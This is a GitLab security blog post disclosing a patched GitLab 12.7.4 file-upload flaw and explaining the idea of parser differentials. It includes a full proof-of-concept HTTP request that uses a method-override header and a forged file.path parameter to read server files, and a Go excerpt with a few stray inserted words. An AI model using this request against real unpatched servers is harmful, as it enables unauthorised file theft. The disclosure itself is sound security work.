--- title: "How to exploit parser differentials" author: Joern Schneeweisz author_gitlab: joernchen author_twitter: joernchen categories: security image_title: '/images/blogimages/closeup-photo-of-black-and-blue-keyboard-1194713.jpg' description: "Your guide to abusing 'language barriers' between web components." tags: security, security research twitter_text: "An in-depth guide to abusing 'language barriers' between web components and exploiting parser differentials" postType: content marketing merch_banner: merch_one --- The move to microservices-based architecture creates more attack surface for nefarious actors, so when our [security researchers](/handbook/engineering/security/#security-research) discovered a file upload vulnerability within GitLab, we patched it right up in our [GitLab 12.7.4 security release](/releases/2020/01/30/security-release-gitlab-12-7-4-released). We dive deeper into the problems that lead to this vulnerability and use it to illustrate the underlying concept of parser differentials. ## File Uploads in GitLab To understand the file upload vulnerability we need to go a bit deeper into file uploads within GitLab, and have a look at the involved components. ### GitLab Workhorse The first relevant component is GitLab's very own reverse proxy called [`gitlab-workhorse`](https://gitlab.com/gitlab-org/gitlab-workhorse/).`gitlab-workhorse` fulfills a variety of tasks, but for this specific example we only care about certain kinds of file uploads. The second component is [`gitlab-rails`](https://gitlab.com/gitlab-org/gitlab), the Ruby on Rails-based heart of GitLab. It's the main application part of GitLab and implements most of the business logic. The following source code excerpts from `gitlab-workhorse` are based on the [`8.18.0`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/tags/v8.18.0) release which was the most recent version at the time of identifying the vulnerability. Consider the following route, defined in [`internal/upstream/routes.go`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/blob/9a9a83e7f92ceea5fb0e1542d604171c58615e28/internal/upstream/routes.go#L207-208), which handles file uploads for [Conan](https://conan.io/) packages: ```go // Conan Artifact Repository route("PUT", apiPattern+`v4/packages/conan/`, filestore.BodyUploader(api, proxy, nil)), ``` The route defined above will pass any `PUT` request to paths underneath `/api/v4/packages/conan/` to the [`BodyUploader`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/blob/9a9a83e7f92ceea5fb0e1542d604171c58615e28/internal/filestore/body_uploader.go#L40-79). Within this `BodyUploader` now some magic happens. Well, actually, it's not magic, the `BodyUploader` receives the uploaded file and lets the `gitlab-rails` backend know where the file has been placed. This happens in [`internal/filestore/file_handler.go`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/blob/9a9a83e7f92ceea5fb0e1542d604171c58615e28/internal/filestore/file_handler.go#L52-81). Also worth mentioning: Any not-matched routes in `gitlab-workhorse` will be passed on to the backend without modification. That's especially important in our discussion for non-`PUT` routes under `/api/v4/packages/conan/`. ```go // GitLabFinalizeFields returns a map with all the fields GitLab Rails needs in order to finalize the upload. func (fh *FileHandler) GitLabFinalizeFields(prefix string) map[string]string { data := make(map[string]string) key := func(field string) string { if prefix == "" { return field } return fmt.Sprintf("%s.%s", prefix, field) } GitLabFinalizeFields if fh.Name != "" { data[key("name")] = fh.Name } if fh.LocalPath != "" { data[key("path")] = fh.LocalPath } if fh.RemoteURL != "" { data[key("remote_url")] = fh.RemoteURL } if fh.RemoteID != "" { data[key("remote_id")] = fh.RemoteID } data[key("size")] = strconv.FormatInt(fh.Size, 10) for hashName, hash := range fh.hashes { data[key(hashName)] = hash } very popular in return data } ``` So `gitlab-workhorse` will replace the uploaded file name by the path to where it has stored the file on disk, such that the `gitlab-rails` backend knows where to pick it up. Observe the following original request, as received by `gitlab-workhorse`: ``` PUT /api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py HTTP/1.1 Host: localhost User-Agent: Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close X-Checksum-Sha1: 93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78 Content-Length: 1765 Authorization: Bearer [.. shortened ..] from conans import ConanFile, CMake, tools class HelloConan(ConanFile): name = "Hello" [.. shortened ..] ``` This is what this request will look like to `gitlab-rails` after `gitlab-workhorse` has processed it (excerpted from `api_json.log`): ```json { "time": "2020-02-20T14:49:44.738Z", "severity": "INFO", "duration": 201.93, "db": 67.34, "view": 134.59, "status": 200, "method": "PUT", "path": "/api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py", "params": [ { "key": "file.md5", "value": "719f0319f1fd5f6fcbc2433cc0008817" }, { "key": "file.path", "value": "/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads/582573467" }, { "key": "file.sha1", "value": "93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78" }, { "key": "file.sha256", "value": "f7059b223cd4d32002e5e34ab1ae5b4ea12f3bd0326589b00d5e910ce02c1f3a" }, { "key": "file.sha512", "value": "efbe75ea58bd817d42fd9ca5ac556abd6fbe3236f66dfad81d508b5860252d32d1b1868ee03c7f4c6174a0ba6cc920a574b5865ca509f36c451113c9108f9a36" }, { "key": "file.size", "value": "1765" } ], "host": "localhost", "remote_ip": ",", "ua": "Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0", "route": "/api/:version/packages/conan/v1/files/:package_name/:package_version/:package_username/:package_channel/:recipe_revision/export/:file_name", "user_id": 1, "username": "root", "queue_duration": 16.59, "correlation_id": "aSEqrgEfvX9" } ``` In particular, the `params` entry `file.path` is of interest, as it denotes the file system path where `gitlab-workhorse` has placed the uploaded file. ### `gitlab-rails` This `gitlab-workhorse`-modified request, as `gitlab-rails` will see it, is handled in [`lib/uploaded_file.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/v12.7.4-ee/lib/uploaded_file.rb#L45-66) within the `from_params` method: ```ruby 01 def self.from_params(params, field, upload_paths) 02 path = params["#{field}.path"] 03 remote_id = params["#{field}.remote_id"] 04 return if path.blank? && remote_id.blank? 05 06 file_path = nil 07 if path 08 file_path = File.realpath(path) 09 10 paths = Array(upload_paths) << Dir.tmpdir 11 unless self.allowed_path?(file_path, paths.compact) 12 raise InvalidPathError, "insecure path used '#{file_path}'" 13 end 14 end 15 16 UploadedFile.new(file_path, 17 filename: params["#{field}.name"], 18 content_type: params["#{field}.type"] || 'application/octet-stream', 19 sha256: params["#{field}.sha256"], 20 remote_id: remote_id, 21 size: params["#{field}.size"]) 22 end ``` We can see here the handling of the uploaded file reference. The part in line `10-13` in the snippet above implements a whitelist of a specific set of paths from where a `gitlab-workhorse` uploaded file will be accepted.`Dir.tmpdir` which resolves to the path `/tmp` is added to the whitelist as well. In the subsequent lines a new `UploadedFile` is constructed from the `file.path` and other parameters `gitlab-workhorse` has set. ## `gitlab-workhorse` bypass So we've seen the inner workings of both `gitlab-workhorse` and `gitlab-rails` when it comes to file uploads for Conan packages. In recap it would go as follows: ```mermaid sequenceDiagram participant User participant workhorse participant Rails User->>workhorse: PUT request to conan registry workhorse->>workhorse: Place uploaded file on disk and re-write PUT request workhorse->>Rails: Pass on modified PUT request Rails->>Rails: Pick up file from disk and store in UploadedFile ``` From an attacker perspective it would be nice to meddle with the modified `PUT` request, especially control over the `file.path` parameter would allow us to grab arbitrary files from `/tmp` and the defined `upload_paths`. But as `gitlab-workhorse` sits right in front of `gitlab-rails` we can't just pass those parameters or otherwise interact directly with `gitlab-rails` without going via `gitlab-workhorse`. We can indeed achieve this by leveraging the fact that `gitlab-workhorse` parses the HTTP requests in a different way than `gitlab-rails` does. In particular, we can use [`Rack::MethodOverride`](https://www.rubydoc.info/gems/rack/Rack/MethodOverride) in `gitlab-rails` which is a default middleware in Ruby on Rails applications. The `Rack::MethodOverride` middleware allows us to send a `POST` request and let `gitlab-rails` know **"well, actually this is a `PUT` request! ¯\\\_(ツ)\_/¯ "**. With this little trick we can sneak past the `gitlab-workhorse` route which would intercept the `PUT` request, as `gitlab-workhorse` is not aware of the overridden `POST` method. So by specifying either a `_method=PUT` parameter or a `X-HTTP-METHOD-OVERRIDE: PUT` HTTP header we can indeed directly point `gitlab-rails` to files on disk. The method override is used a lot in Ruby on Rails applications to allow simple `
` based `POST` requests to use other [`REST`](https://de.wikipedia.org/wiki/Representational_State_Transfer)-based methods like `PUT` and `DELETE` by overriding the ``s `POST` request with the `_method` parameter. So a `POST` request to the right Conan endpoint with a `file.path` and `file.size` parameter will do the trick. A full request using this bypass would look like this: ``` POST /api/v4/packages/conan/v1/files/Hello/0.1/lol+wat/beta/0/export/conanmanifest.txt?file.size=4&file.path=/tmp/test1234 HTTP/1.1 Host: localhost User-Agent: Conan/1.21.0 (Python 3.8.1) python-requests/2.22.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close X-HTTP-Method-Override: PUT X-Checksum-Deploy: true X-Checksum-Sha1: ee96149f7b93af931d4548e9562484bdb6ac8fda Content-Length: 4 Authorization: Bearer [.. shortened ..] asdf ``` This would, instead of uploading a file, let us get a hold of the file `/tmp/test1234` from the GitLab server's file system. In recap, the flow to exploit this issue looks as follows: ```mermaid sequenceDiagram participant User participant workhorse participant Rails User->>workhorse: POST request to conan registry workhorse->>workhorse: Route does not match anything workhorse->>Rails: Pass on unmodified POST request Rails->>Rails: Interpret as PUT and pick up file from disk ``` We fixed this issue within `gitlab-workhorse` by [signing Requests which pass `gitlab-workhorse`](https://gitlab.com/gitlab-org/gitlab-workhorse/-/commit/3a34323b104be89e92db49828268f0bfd831e75a), the signature then is verified on [the `gitlab-rails` side](https://gitlab.com/gitlab-org/gitlab/-/commit/043c664908e474f34e62e88365be0fc945f1d0b3) ## How parser differentials can introduce vulnerabilities Let's take a huge step back and see from an high-level perspective what just happened. We've had `gitlab-workhorse` and `gitlab-rails` both looking at a `POST` request. But `gitlab-rails` ultimately saw a `PUT` request due to the overridden HTTP method. What occurred here is a case of a **parser differential**, as `gitlab-workhorse` and `gitlab-rails` parsed the incoming HTTP request differently. The term parser differential originates from the [Language-theoretic Security approach](http://langsec.org). It denotes the fact that two (or more) different parsers "understand" the very same message in a different way. Or, as described in the [LangSec handout](http://langsec.org/bof-handout.pdf) as follows: > Different interpretation of messages or data streams by components breaks any assumptions that components adhere to a shared specification and so introduces inconsistent state and unanticipated computation. Indeed such issues and the consequential _unanticipated computation_ get more and more common when we look at modern web environments. The days of web applications being a stand-alone bunch of scripts invoked on a web server are long gone. The rise of microservices leads to complex environments and the very same message (or HTTP request) might be interpreted by several different services in several different ways. Just as shown in the above example this sometimes comes along with security implications. From the point of view of a pragmatic bug hunter, the idea of parser differentials is very interesting as those issue can yield unique security bugs. Consider, for instance, this [RCE in couchdb](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). Also the [HTTP desync attack technique](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn), which has gotten a lot attention in the bug bounty community, is a matter of parser differentials. For the developer perspective we need to be aware of other components and their parsing behavior in order to avoid security issues which arise from interpreting the same message differently. Cover Photo by [Marta Branco](https://www.pexels.com/@martabranco?utm_content=attributionCopyText&utm_medium=referral&utm_source=pexels) on [Pexels](https://www.pexels.com/photo/closeup-photo-of-black-and-blue-keyboard-1194713/?utm_content=attributionCopyText&utm_medium=referral&utm_source=pexels) {: .note}